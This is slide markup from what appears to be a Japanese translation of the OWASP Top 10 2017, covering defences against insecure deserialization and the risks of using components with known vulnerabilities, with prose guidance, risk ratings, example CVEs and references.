            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>悪意のあるオブジェクトの生成やデータの改ざんを防ぐために、シリアライズされたオブジェクトにデジタル署名などの整合性チェックを実装する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>コードは定義可能なクラスに基づくため、オブジェクトを生成する前に、デシリアライゼーションにおいて厳密な型制約を強制する。ただし、この手法を回避する方法は実証済みなので、この手法頼みにすることはお勧め出来ない。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可能であればデシリアライズに関するコードは分離して、低い権限の環境下で実行する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>型の不整合やデシリアライズ時に生じた例外など、デシリアライゼーションで発生した失敗や例外はログに記録する。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>デシリアライズするコンテナやサーバからの、送受信に関するネットワーク接続は、制限もしくはモニタリングする。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>特定のユーザが絶えずデシリアライズしていないか、デシリアライゼーションをモニタリングし、警告する。</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安全でないデシリアライゼーション</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300939342"/>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5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a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>悪用のしやすさ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>蔓延度</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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>技術面</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ja-JP" altLang="en-US" sz="1000" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>既成のエクスプロイト手法は、元のエクスプロイトコードに変更や調整を加えずに攻撃が成功するケースはまれです。そのためデシリアライゼーションの悪用は、容易ではありません。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="11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ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>この問題は、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>が行った</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>業界調査</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に基づき</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>に組み込まれましたが、定量的なデータに基づいたものではありません。 ツールによっては、デシリアライゼーションに関する欠陥を発見可能ですが、問題を検証するために、多くの場合、人手による支援が必要です。デシリアライゼーション問題の検知と対応に役立つツールが整備されるにつれ、この欠陥が流行するのではないかと考えられます。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>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ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>デシリアライゼーションの欠陥による影響は、憂慮すべきものです。 これらの欠陥は、最も深刻な攻撃の一つであるリモートコード実行攻撃を可能にします。 </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ja-JP" altLang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ビジネス面への影響は、アプリケーションとデータを保護する重要性に依存します。</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-ea"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>シナリオ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>#1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>　</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>コンポーネントは通常、アプリケーション自体と同じ権限で実行されるため、どんなコンポーネントに存在する欠陥も、深刻な影響を及ぼす可能性があります。そのような欠陥は、偶発的（例：コーディングエラー）または意図的（例：コンポーネントのバックドア）両方の可能性があります。 発見済みの悪用可能なコンポーネントの脆弱性の例：</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Apache Struts 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>においてリモートで任意のコードが実行される脆弱性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は、重大な侵害をもたらしています。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Internet of things (IoT)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は、頻繁なパッチ適用が困難もしくは不可能ですが、一方でパッチ適用の重要性はますます高まっています。（例：医療機器）</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻撃者を助けるようなツールがあり、パッチが未適用なシステムやシステムの設定ミスを自動的に見つけることができます。例えば、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Shodan IoT search engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>は、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2014</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>年</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>月にパッチが適用された</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>の脆弱性などセキュリティに問題のある機器を見つけることができます。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US"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latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以下に該当する場合、脆弱と言えます</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用しているすべてのコンポーネントのバージョンを知らない場合（クライアントサイド・サーバサイドの両方について）。これには直接使用するコンポーネントだけでなく、ネストされた依存関係も含む。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ソフトウェアが脆弱な場合やサポートがない場合、また使用期限が切れている場合。これには、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>や</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>サーバ、アプリケーションサーバ、データベース管理システム（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DBMS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）、アプリケーション、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、すべてのコンポーネント、ランタイム環境とライブラリを含む場合。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>脆弱性スキャンを定期的にしていない場合や、使用しているコンポーネントに関するセキュリティ情報を購読していない場合。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基盤プラットフォームやフレームワークおよび依存関係をリスクに基づきタイムリーに修正またはアップグレードしない場合。パッチ適用が変更管理の下、月次や四半期のタスクとされている環境でよく起こる。これにより、当該組織は、解決済みの脆弱性について、何日も、場合によっては何ヶ月も不必要な危険にさらされることになる。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ソフトウェア開発者が、更新やアップグレードまたはパッチの互換性をテストしない場合。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>コンポーネントの設定をセキュアにしていない場合。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>A6:2017-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>不適切なセキュリティ設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 参照</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900"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Application Security Verification Standard: V1 Architecture, design and threat modelling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Testing Guide: Map Application Architecture (OTG-INFO-010)</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ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>外部資料</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" altLang="ja-JP" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13"/>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The Unfortunate Reality of Insecure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8"/>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9"/>
              </a:rPr>
              <a:t>Ruby Libraries Security Advisory Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId19"/>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pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>以下に示すパッチ管理プロセスが必要です：</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buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
